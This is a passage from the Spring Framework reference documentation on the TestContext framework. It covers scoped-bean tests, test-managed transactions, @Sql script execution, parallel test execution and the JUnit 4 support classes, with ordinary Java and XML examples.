We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). 
Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<data-access.adoc#tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia 
the `@Commit` and `@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nSince Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured to commit the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in a test class or any `void` default method in a test interface with one of these\nannotations, and the `TransactionalTestExecutionListener` ensures that your __before\ntransaction method__ or __after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit Jupiter's `@BeforeEach`) and\nany __after methods__ (such as methods annotated with JUnit Jupiter's `@AfterEach`) are\nexecuted __within__ a transaction. In addition, methods annotated with\n`@BeforeTransaction` or `@AfterTransaction` are naturally not executed for test methods\nthat are not configured to run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. 
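A minimal configuration that satisfies this requirement might look like the following
sketch (the embedded database and the class name `TestDatabaseConfig` are illustrative
assumptions, not prescribed by the framework):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class TestDatabaseConfig {

		@Bean
		public DataSource dataSource() {
			// an in-memory database keeps the sketch self-contained
			return new EmbeddedDatabaseBuilder().generateUniqueName(true).build();
		}

		@Bean
		public PlatformTransactionManager transactionManager(DataSource dataSource) {
			// the bean the TransactionalTestExecutionListener looks up
			return new DataSourceTransactionManager(dataSource);
		}
	}
----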
In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit 4 based example displays a _fictitious_ integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of a Hibernate session or JPA\npersistence context, make sure to __flush__ the underlying unit of work within test\nmethods that execute that code. Failing to flush the underlying unit of work can produce\n__false positives__: your test may pass, but the same code throws an exception in a live,\nproduction environment. In the following Hibernate-based example test case, one method\ndemonstrates a false positive, and the other method correctly exposes the results of\nflushing the session. 
Note that this applies to any ORM frameworks that maintain an\nin-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tSessionFactory sessionFactory;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@PersistenceContext\n\tEntityManager entityManager;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<data-access.adoc#jdbc-embedded-database-support, Embedded database support>> and\n<<data-access.adoc#jdbc-embedded-database-dao-testing,\nTesting data access logic with an embedded database>> for details.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. 
`ResourceDatabasePopulator` provides options for configuring the
character encoding, statement separator, comment delimiters, and error handling flags
used when parsing and executing the scripts, and each of the configuration options has
a reasonable default value. Consult the javadocs for details on default values. To
execute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either
the `populate(Connection)` method to execute the populator against a
`java.sql.Connection` or the `execute(DataSource)` method to execute the populator
against a `javax.sql.DataSource`. The following example specifies SQL scripts for a test
schema and test data, sets the statement separator to `"@@"`, and then executes the
scripts against a `DataSource`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	public void databaseTest() {
		ResourceDatabasePopulator populator = new ResourceDatabasePopulator();
		populator.addScripts(
			new ClassPathResource("test-schema.sql"),
			new ClassPathResource("test-data.sql"));
		populator.setSeparator("@@");
		populator.execute(this.dataSource);
		// execute code that uses the test schema and data
	}
----

Note that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing
and executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in
<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and
<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>
internally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs
for the various `executeSqlScript(..)` methods for further details.


[[testcontext-executing-sql-declaratively]]
===== Executing SQL scripts declaratively with @Sql

In addition to the aforementioned mechanisms for executing SQL scripts
_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring
TestContext Framework. Specifically, the `@Sql` annotation can be declared on a test
class or test method to configure the resource paths to SQL scripts that should be
executed against a given database either before or after an integration test method. Note
that method-level declarations override class-level declarations and that support for
`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.

*Path resource semantics*

Each path will be interpreted as a Spring `Resource`. A plain path -- for example,
`"schema.sql"` -- will be treated as a classpath resource that is _relative_ to the
package in which the test class is defined. A path starting with a slash will be treated
as an _absolute_ classpath resource, for example: `"/org/example/schema.sql"`.
A path
which references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)
will be loaded using the specified resource protocol.

The following example demonstrates how to use `@Sql` at the class level and at the method
level within a JUnit Jupiter based integration test class.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@SpringJUnitConfig
	@Sql("/test-schema.sql")
	class DatabaseTests {

		@Test
		void emptySchemaTest() {
			// execute code that uses the test schema without any test data
		}

		@Test
		@Sql({"/test-schema.sql", "/test-user-data.sql"})
		void userTest() {
			// execute code that uses the test schema and test data
		}
	}
----

*Default script detection*

If no SQL scripts are specified, an attempt will be made to detect a _default_ script
depending on where `@Sql` is declared. If a default cannot be detected, an
`IllegalStateException` will be thrown.

* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the
	corresponding default script is `"classpath:com/example/MyTest.sql"`.
* __method-level declaration__: if the annotated test method is named `testMethod()` and is
	defined in the class `com.example.MyTest`, the corresponding default script is
	`"classpath:com/example/MyTest.testMethod.sql"`.

*Declaring multiple `@Sql` sets*

If multiple sets of SQL scripts need to be configured for a given test class or test
method but with different syntax configuration, different error handling rules, or
different execution phases per set, it is possible to declare multiple instances of
`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the
`@SqlGroup` annotation can be used as an explicit container for declaring multiple
instances of `@Sql`.

The following example demonstrates the use of `@Sql` as a repeatable annotation using
Java 8. In this scenario the `test-schema.sql` script uses a different syntax for
single-line comments.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`"))
	@Sql("/test-user-data.sql")
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

The following example is identical to the above except that the `@Sql` declarations are
grouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@SqlGroup({
		@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`")),
		@Sql("/test-user-data.sql")
	})
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

*Script execution phases*

By default, SQL scripts will be executed _before_ the corresponding test method. However,
if a particular set of scripts needs to be executed _after_ the test method -- for
example, to clean up database state -- the `executionPhase` attribute in `@Sql` can be
used as seen in the following example.
Note that `ISOLATED` and `AFTER_TEST_METHOD` are
statically imported from `SqlConfig.TransactionMode` and `Sql.ExecutionPhase`,
respectively.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "create-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED)
	)
	@Sql(
		scripts = "delete-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED),
		executionPhase = AFTER_TEST_METHOD
	)
	public void userTest() {
		// execute code that needs the test data to be committed
		// to the database outside of the test's transaction
	}
----

*Script configuration with `@SqlConfig`*

Configuration for script parsing and error handling can be configured via the
`@SqlConfig` annotation. When declared as a class-level annotation on an integration test
class, `@SqlConfig` serves as _global_ configuration for all SQL scripts within the test
class hierarchy. When declared directly via the `config` attribute of the `@Sql`
annotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared
within the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit
default value which is documented in the javadocs of the corresponding attribute. Due to
the rules defined for annotation attributes in the Java Language Specification, it is
unfortunately not possible to assign a value of `null` to an annotation attribute. Thus,
in order to support overrides of inherited global configuration, `@SqlConfig` attributes
have an explicit default value of either `""` for Strings or `DEFAULT` for Enums. This
approach allows local declarations of `@SqlConfig` to selectively override individual
attributes from global declarations of `@SqlConfig` by providing a value other than `""`
or `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`
attributes do not supply an explicit value other than `""` or `DEFAULT`. Explicit _local_
configuration therefore overrides _global_ configuration.

The configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those
supported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those
provided by the `<jdbc:initialize-database/>` XML namespace element. Consult the javadocs
of individual attributes in `@Sql` and `@SqlConfig` for details.

[[testcontext-executing-sql-declaratively-tx]]
*Transaction management for `@Sql`*

By default, the `SqlScriptsTestExecutionListener` will infer the desired transaction
semantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed
without a transaction, within an existing Spring-managed transaction -- for example, a
transaction managed by the `TransactionalTestExecutionListener` for a test annotated with
`@Transactional` -- or within an isolated transaction, depending on the configured value
of the `transactionMode` attribute in `@SqlConfig` and the presence of a
`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum,
however, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.

If the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and
`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,
you may specify explicit names via the `dataSource` and `transactionManager` attributes
of `@SqlConfig`.
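For example, the following sketch declares explicit bean names (`testDataSource` and
`testTxMgr` are illustrative assumptions, not names defined by the framework):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "/test-data.sql",
		config = @SqlConfig(dataSource = "testDataSource", transactionManager = "testTxMgr")
	)
	public void explicitNamesTest() {
		// the script above is executed using the explicitly named beans
		// instead of the ones detected by SqlScriptsTestExecutionListener
	}
----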
Furthermore, the transaction propagation behavior can be controlled via\nthe `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be\nexecuted in an isolated transaction. Although a thorough discussion of all supported\noptions for transaction management with `@Sql` is beyond the scope of this reference\nmanual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide\ndetailed information, and the following example demonstrates a typical testing scenario\nusing JUnit Jupiter and transactional tests with `@Sql`. Note that there is no need to\nclean up the database after the `usersTest()` method is executed since any changes made\nto the database (either within the test method or within the `\/test-data.sql` script)\nwill be automatically rolled back by the `TransactionalTestExecutionListener` (see\n<<testcontext-tx,transaction management>> for details).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@SpringJUnitConfig(TestDatabaseConfig.class)\n\t@Transactional\n\tclass TransactionalSqlScriptsTests {\n\n\t\tfinal JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tTransactionalSqlScriptsTests(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\t@Sql(\"\/test-data.sql\")\n\t\tvoid usersTest() {\n\t\t\t\/\/ verify state in test database:\n\t\t\tassertNumUsers(2);\n\t\t\t\/\/ execute code that uses the test data...\n\t\t}\n\n\t\tint countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tvoid assertNumUsers(int expected) {\n\t\t\tassertEquals(expected, countRowsInTable(\"user\"),\n\t\t\t\t\"Number of rows in the [user] table.\");\n\t\t}\n\t}\n----\n\n\n[[testcontext-parallel-test-execution]]\n==== Parallel test execution\n\nSpring Framework 5.0 introduces basic support for executing tests in parallel within a\nsingle JVM when using the _Spring TestContext Framework_. In general this means that most\ntest classes or test methods can be executed in parallel without any changes to test code\nor configuration.\n\n[TIP]\n====\nFor details on how to set up parallel test execution, consult the documentation for your\ntesting framework, build tool, or IDE.\n====\n\nKeep in mind that the introduction of concurrency into your test suite can result in\nunexpected side effects, strange runtime behavior, and tests that only fail intermittently\nor seemingly randomly. The Spring Team therefore provides the following general guidelines\nfor when __not__ to execute tests in parallel.\n\n__Do not execute tests in parallel if:__\n\n* Tests make use of Spring's `@DirtiesContext` support.\n* Tests make use of JUnit 4's `@FixMethodOrder` support or any testing framework feature\n that is designed to ensure that test methods execute in a particular order. Note,\n however, that this does not apply if entire test classes are executed in parallel.\n* Tests change the state of shared services or systems such as a database, message broker,\n filesystem, etc. This applies to both in-memory and external systems.\n\n[TIP]\n====\nIf parallel test execution fails with an exception stating that the `ApplicationContext`\nfor the current test is no longer active, this typically means that the\n`ApplicationContext` was removed from the `ContextCache` in a different thread.\n\nThis may be due to the use of `@DirtiesContext` or due to automatic eviction from the\n`ContextCache`. 
If `@DirtiesContext` is the culprit, you will either need to find a way\nto avoid using `@DirtiesContext` or exclude such tests from parallel execution. If the\nmaximum size of the `ContextCache` has been exceeded, you can increase the maximum size\nof the cache. See the discussion on <<testcontext-ctx-management-caching,context\ncaching>> for details.\n====\n\n[WARNING]\n====\nParallel test execution in the Spring TestContext Framework is only possible if the\nunderlying `TestContext` implementation provides a _copy constructor_ as explained in the\njavadocs for `TestContext`. The `DefaultTestContext` used in Spring provides such a\nconstructor; however, if you use a third-party library that provides a custom\n`TestContext` implementation, you will need to verify if it is suitable for parallel test\nexecution.\n====\n\n[[testcontext-support-classes]]\n==== TestContext Framework support classes\n\n\n[[testcontext-junit4-runner]]\n===== Spring JUnit 4 Runner\n\nThe __Spring TestContext Framework__ offers full integration with JUnit 4 through a\ncustom runner (supported on JUnit 4.12 or higher). By annotating test classes with\n`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`\nvariant, developers can implement standard JUnit 4 based unit and integration tests and\nsimultaneously reap the benefits of the TestContext framework such as support for loading\napplication contexts, dependency injection of test instances, transactional test method\nexecution, and so on. If you would like to use the Spring TestContext Framework with an\nalternative runner such as JUnit 4's `Parameterized` or third-party runners such as the\n`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support\nfor JUnit rules>> instead.\n\nThe following code listing displays the minimal requirements for configuring a test class\nto run with the custom Spring `Runner`. `@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit 4 Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit 4's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. 
The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule springClassRule = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit 4 support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit 4 based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-junit-jupiter-extension]]\n===== SpringExtension for JUnit Jupiter\n\nThe __Spring TestContext Framework__ offers full integration with the _JUnit Jupiter_\ntesting framework introduced in JUnit 5. 
